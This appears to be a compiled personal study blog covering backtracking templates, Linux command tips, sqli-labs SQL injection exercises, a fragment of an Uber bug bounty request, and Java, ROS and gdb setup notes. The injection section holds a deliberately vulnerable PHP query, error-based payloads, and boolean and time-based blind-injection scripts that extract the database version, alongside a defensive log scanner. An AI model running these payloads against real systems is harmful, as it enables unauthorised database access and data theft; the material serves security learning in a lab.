Algorithm study notes




A general recursive template for backtracking:

   helper(parameters of given data, current recursive level) {
        // Handle the base case, i.e. the last level of the recursion
        if (level == lastLevel) {
            record result;
            return sth;
        }
        // Otherwise try every possible value for this level and recurse.
        for (every possible value for this level) {
            helper(parameters of given data, next recursive level);
        }
        return sth;
   }
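The template filled in twice, as an added example that is not part of the original notes: once without pruning (all permutations of a sequence) and once with a feasibility check at each level (the N-queens problem, one queen per row), so the "record result / try every value / recurse" shape is visible in real code.

```python
def permutations(items):
    """Backtracking per the template: `level` is the position being filled;
    the base case is reached when every position has a value."""
    results = []

    def helper(level, current, remaining):
        # Base case: the last level has been filled, record the result.
        if level == len(items):
            results.append(tuple(current))
            return
        # Otherwise try every possible value for this level and recurse.
        for i, value in enumerate(remaining):
            current.append(value)
            helper(level + 1, current, remaining[:i] + remaining[i + 1:])
            current.pop()  # undo the choice before trying the next value

    helper(0, [], list(items))
    return results


def n_queens(n):
    """Same template with pruning: each level is a row, each value a column,
    and columns attacked by queens already placed are skipped."""
    solutions = []

    def helper(row, cols):
        if row == n:
            solutions.append(tuple(cols))
            return
        for col in range(n):
            # A column is safe if no earlier queen shares it or a diagonal.
            if all(col != c and abs(col - c) != row - r
                   for r, c in enumerate(cols)):
                helper(row + 1, cols + [col])

    helper(0, [])
    return solutions


if __name__ == "__main__":
    print(permutations("abc"))
    print(n_queens(4))  # two solutions for a 4x4 board
```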


Some interesting Linux commands

1. Supervise command (run every 2s)

watch "ls -larth"

2. Kill program using one port

sudo fuser -k 8000/tcp

3. Limit memory usage for following commands

ulimit -Sv 1000       # 1000 KBs = 1 MB
ulimit -Sv unlimited  # Remove limit

4. Rename selected files using a regular expression

rename 's/\.bak$/.txt/' *.bak

5. Get full path of file

readlink -f file.txt

6. List contents of tar.gz and extract only one file

tar tf file.tgz
tar xf file.tgz filename

7. List files by size

ls -lS

8. Nice trace route


9. Find files tips

find . -size 20c             # By file size (20 bytes)
find . -name "*.gz" -delete  # Delete files
find . -exec echo {} \;      # One file by line
find . -exec echo {} \+      # All in the same line
./file1 ./file2 ./file3

10. Print text ad infinitum

yes hello

11. Who is logged in?


12. Prepend line number

ls | nl

13. Grep with Perl-like syntax (allows chars like \t)

grep -P "\t"

14. Cat backwards (starting from the end)

tac file

15. Check the permissions of each directory on the path to a file

It is useful for detecting permission errors, for example when configuring a web server.

namei -l /path/to/file.txt

16. Run a command every time a file is modified

# <command> is a placeholder: the original line ended after the file name
while inotifywait -e close_write document.tex; do <command>; done

17. Copy to clipboard

cat file.txt | xclip -selection clipboard

18. Spell and grammar check in LaTeX

detex file.tex | diction -bs

You may need to install the following: sudo apt-get install diction texlive-extra-utils.

19. Check resources’ usage of command

/usr/bin/time -v ls

20. Randomize lines in file

cat file.txt | sort -R
cat file.txt | sort -R | head  # Pick a random sample

# Even better (suggested by xearl on Hacker News):
shuf file.txt

21. Keep program running after leaving SSH session

If the program doesn’t need any interaction:

nohup ./ &

If you need to enter some input manually and then want to leave:

<Type any input you want>
<Ctrl-Z>          # send process to sleep
jobs -l           # find out the job id
disown -h jobid   # disown job
bg                # continue running in the background

Of course, you can also use screen or tmux for this purpose.

22. Run a command for a limited time

timeout 10s ./

# Restart every 30 minutes
while true; do timeout 30m ./; done

23. Compare lines of two sorted files

comm file1 file2

Prints these three columns:

  1. Lines unique to file1.
  2. Lines unique to file2.
  3. Lines both in file1 and file2.

With options -1, -2, -3, you can remove each of these columns.

24. Split a long file into files with the same number of lines

split -l LINES -d file.txt output_prefix

25. Flush swap partition

If a program eats too much memory, the swap fills up with the memory pages that were evicted, and when memory use goes back to normal everything stays slow because those pages remain in swap. Just restart the swap partition to fix it:

sudo swapoff -a
sudo swapon -a

26. Fix an ext4 file system with a damaged superblock

sudo fsck.ext4 -f -y /dev/sda1   # force a full check, answer yes to all repairs
sudo fsck.ext4 -v /dev/sda1      # verbose re-check
sudo mke2fs -n /dev/sda1         # dry run (-n): only lists where the backup superblocks are, writes nothing
sudo e2fsck -b <first block number of previous list> /dev/sda1   # -b: repair using that backup superblock

27. Create empty file of given size

fallocate -l 1G test.img

28. Manipulate PDFs from the command line

To join, shuffle, select, etc. pdftk is a great tool:

pdftk *.pdf cat output all.pdf        # Join PDFs together
pdftk A=in.pdf cat A5 output out.pdf  # Extract page from PDF

You can also manipulate the content with cpdf:

cpdf -draft in.pdf -o out.pdf      # Remove images
cpdf -blacktext in.pdf -o out.pdf  # Convert all text to black color

29. Monitor the progress in terms of generated output

# Write random data, encode it in base64 and monitor how fast it
# is being sent to /dev/null
cat /dev/urandom | base64 | pv -lbri2 > /dev/null

# pv options:
#   -l,  lines
#   -b,  total counter
#   -r,  show rate
#   -i2, refresh every 2 seconds

30. Find packages that have a given file in Ubuntu

apt-file update
apt-file search dir/file.h





1. Error-based string SQLi


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // $id is pasted straight into the query
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "</font>";
}
else
{
    echo '<font color= "#FFFF00">';
    print_r(mysql_error());   // the raw MySQL error is echoed to the page
    echo "</font>";
}


The principle is fairly simple. Generally some function X is used, say X(exp): when MySQL executes it, it first evaluates exp inside the function, takes its return value, and then passes that return value as the argument to X. When exp's return value does not match what X accepts as a parameter, the query fails and the error is printed.

Here is an error-based cheat sheet compiled by a Russian researcher:

Constructed exp: '|polygon((select*from(select name_const(version(),1))x))%23

2. Error-based integer SQLi


exp:|polygon((select*from(select name_const(version(),1))x))%23


exp: ')|polygon((select*from(select name_const(version(),1))x))%23

4. Error-based injection with double quotes and parentheses; just tweak the exp:

exp: ")|polygon((select*from(select name_const(version(),1))x))%23

5. String injection with single quotes, same as the first exercise

exp: ' |polygon((select*from(select name_const(version(),1))x))%23

6. String injection with double quotes

exp: "|polygon((select*from(select name_const(version(),1))x))%23



This line means that the specific error is no longer shown; only "You have an error in your SQL syntax" is displayed, so the error-based injection of the previous exercises cannot be used here. Following the hint in the title, "dump into outfile": because of the permissions I set, the apache user cannot write files, so I'll just give the exp directly:

1')) union select 1,2,3 into outfile "/tmp/test.txt" --+

8. Boolean-based blind injection; here we tell the two cases apart with and 1=1 / and 1=2:

?id=1'+and+1=1--+   same response as id=1

?id=1'+and+1=2--+   different response from id=1
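Added example (not from the original notes or from sqli-labs): the id query from the PHP above rebuilt in Python against an in-memory SQLite table with constructed rows, to show why the and 1=1 / and 1=2 probes give different responses when the parameter is concatenated into the query but identical ones when it is bound, and why the error-based exp only breaks the concatenated statement.

```python
import sqlite3

# Constructed stand-in for the lab's `users` table (sample rows, not the lab's data).
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db

def lookup_vulnerable(db, user_id):
    # Mirrors the PHP line above: the parameter is pasted into the query text,
    # so a quote in it closes the string and whatever follows becomes SQL.
    sql = "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return db.execute(sql).fetchone()

def lookup_safe(db, user_id):
    # Parameterised: the value is bound as data and cannot change the statement.
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return db.execute(sql, (user_id,)).fetchone()

def boolean_probe(lookup):
    """Send the two probes from the notes; return whether each found a row.
    A differing pair is exactly the signal boolean-based blind injection needs."""
    db = make_db()
    found_true = lookup(db, "1' and 1=1-- ") is not None
    found_false = lookup(db, "1' and 1=2-- ") is not None
    return found_true, found_false

def query_errors(lookup, payload):
    """True if the payload breaks the statement itself, the failure mode the
    error-based exercises turn into an information channel via mysql_error()."""
    db = make_db()
    try:
        lookup(db, payload)
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    # The string exp from the notes, URL-decoded (%23 -> #).
    ERR = "'|polygon((select*from(select name_const(version(),1))x))#"
    for name, fn in (("concatenated", lookup_vulnerable), ("parameterised", lookup_safe)):
        print(name, "rows found for 1=1 / 1=2:", boolean_probe(fn),
              "statement error:", query_errors(fn, ERR))
```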


import requests

BASE_URL = ""  # the target URL was stripped from the original notes; put it here
payload = '0123456789.abcdefghijklmnopqrstuvwxyz'

for posi in range(1, 21):                # SUBSTRING() positions are 1-based
    for asc in payload:
        url = BASE_URL + "'+AND ASCII(SUBSTRING(version(),%d,1))=%d--+" \
              % (posi, ord(asc))
        result = requests.get(url)
        # print(url)
        if "You are in" in result.text:  # the page's true-branch marker
            print(asc, end='')


MySQL mainly offers two functions, sleep and benchmark; SQL Server has waitfor time and waitfor delay. Time-based blind injection is largely the same as boolean-based blind injection; here we tell whether the statement executed from the delay the MySQL database introduces, which in turn delays our HTTP response.


import requests
import time

BASE_URL = ""  # the target URL was stripped from the original notes; put it here
payload = '0123456789.abcdefghijklmnopqrstuvwxyz'

for posi in range(1, 21):                # SUBSTRING() positions are 1-based
    for asc in payload:
        FirstRun = time.time()
        url = BASE_URL + "'" \
              "+AND+IF(ASCII(SUBSTRING(version(),%d,1))=%d,SLEEP(5),0)--+" \
              % (posi, ord(asc))
        result = requests.get(url)
        SecondRun = time.time()
        # print(url)
        # print(SecondRun, FirstRun)
        if SecondRun - FirstRun > 1:     # the 5s SLEEP() fired: the guess was right
            print(asc, end='')
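From the defender's side, as an added example that is not part of the original notes: the two blind scripts above enumerate version() one character at a time, so their traffic leaves a distinctive trail in the web server's access log. This scanner URL-decodes the request line of constructed combined-format log entries, matches the constructs those scripts emit (ASCII(SUBSTRING(, SLEEP(/BENCHMARK(, and 1=1 / and 1=2) and aggregates hits per client.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines. Lines 1, 2 and 4 are the probes the boolean and
# time-based scripts above would send; line 3 is an ordinary request.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1%27+AND+ASCII%28SUBSTRING%28version%28%29%2C1%2C1%29%29%3D53--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%27+AND+IF%28ASCII%28SUBSTRING%28version%28%29%2C1%2C1%29%29%3D53%2CSLEEP%285%29%2C0%29--+ HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%27+and+1%3D2--+ HTTP/1.1" 200 498',
]

# client ip, then the request target of the "METHOD target protocol" field
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Signatures for the constructs the blind scripts above emit (case-insensitive).
SIGNATURES = {
    "boolean-char-probe": re.compile(r"ASCII\s*\(\s*SUBSTRING\s*\(", re.I),
    "time-delay": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "tautology-probe": re.compile(r"\b(AND|OR)\s+1\s*=\s*[12]\b", re.I),
}

def classify(line):
    """Return (client_ip, [matched signature names]) or None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    decoded = unquote_plus(target)  # %27 -> ', + -> space: the SQL becomes readable
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return ip, hits

def scan(lines):
    """Aggregate signature hits per client IP. The scripts iterate over every
    character position, so a real run appears as a burst of hits from one host."""
    per_ip = defaultdict(Counter)
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            ip, hits = parsed
            per_ip[ip].update(hits)
    return dict(per_ip)

if __name__ == "__main__":
    for ip, counts in scan(LOG_LINES).items():
        print(ip, dict(counts))
```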






exp: uname=admin&passwd=')/updatexml(0,repeat(version(),2),0)#


exp: uname=admin&passwd="/updatexml(0,repeat(version(),2),0)#

15. POST boolean-based blind injection

exp script:

import requests

url = ""  # the target URL was stripped from the original notes; put it here
payload = '0123456789.abcdefghijklmnopqrstuvwxyz'

for posi in range(1, 21):                # SUBSTRING() positions are 1-based
    for asc in payload:
        # separate name for the injected value: the original reassigned
        # `payload` here, clobbering the character set being iterated
        injection = "admin' AND ASCII(SUBSTRING(version(),%d,1))=%d#" \
              % (posi, ord(asc))
        data = {'uname': 'admin', 'passwd': injection}
        result = requests.post(url, data=data)
        # print(data)
        if "flag.jpg" in result.text:    # the page's true-branch marker
            print(asc, end='')

16. POST time-based blind injection




Recently I applied for a pile of security summer internships, and the result was either a rejection or silence, without a single OA or phone-screen opportunity; I also really can't bring myself to look for an SDE job. Looking back over the past year, I struggled through coursework at school and wrote some code in the lab, but I seem to have made no progress at all in security.



With only a year left before graduation, finding a job is not that hard as such, but I can't stand my own muddling along, so I'm making a small plan here: learn security properly from scratch and record the whole learning process on this blog. For every problem I run into, study it carefully and understand the underlying principles: learn it and hack it.



2. CVE web vulnerabilities

3. Bug bounty



Bug bounty note: UBER

Free Uber:

POST /api/dial/v2/requests HTTP/1.1
Host:
{"start_latitude":12.925151699999999,"start_longitude":77.6657536,

change payment_method_id

reference url :

Install Eclipse on Ubuntu 14.04

Before installing, you should update your JRE and JDK to 8:

Final Update


sudo apt-get install openjdk-8-jdk


sudo apt-get install openjdk-8-jre

Old Update

I found two repositories, but I do not recommend them:

  • OpenJDK builds (all archs)
  • OpenJDK 8 backport for trusty

Original Message

If you really want to use OpenJDK, you have to compile it from source. There is still no PPA for OpenJDK.

It has been requested at

I recommend you use the Webupd8 Oracle Java8 Installer:

sudo add-apt-repository ppa:webupd8team/java -y
sudo apt-get update
sudo apt-get install oracle-java8-installer

To automatically set up the Java 8 environment variables:

sudo apt-get install oracle-java8-set-default

Check it:

java -version

So you have to wait to use OpenJDK8.


Then download Eclipse from

Unpack and install it.

ROS study note

You can choose any editor you like to implement your ROS project. There are some official IDE configurations for ROS:

I prefer using VIM. There is a VIM plugin named rosvim we can use. To install it:

(I use spf13-vim so it uses vundle to manage VIM plugin)

$ echo Bundle \'taketwo/vim-ros\' >> ~/.vimrc.bundles.local
$ vim +BundleInstall! +BundleClean +q

When I run roscore (ROS master) on the sensor and then try to run "rosnode echo rosout" to print the information of rosout, it shows "Couldn't find an AF_INET address for ". So we should set ROS_IP on our host, like "export ROS_IP=".



When compiling: add -g

Start debugging: gdb [-tui] test

Set a breakpoint: (gdb) break test.c:123 or (gdb) b main

Run the program (arguments may follow): (gdb) run [arg1 arg2]

Clear breakpoints: (gdb) clear

Show the call stack: (gdb) where

Print a variable: (gdb) print f.BlockType

Print in hexadecimal: (gdb) print/x f.BlockType

Step over (do not enter functions): (gdb) next or (gdb) n

Step into functions: (gdb) step or (gdb) s

Display a variable after every command: (gdb) display f.BlockType

Set a variable: (gdb) set f.BlockType=0

Continue running: (gdb) cont

Quit: (gdb) quit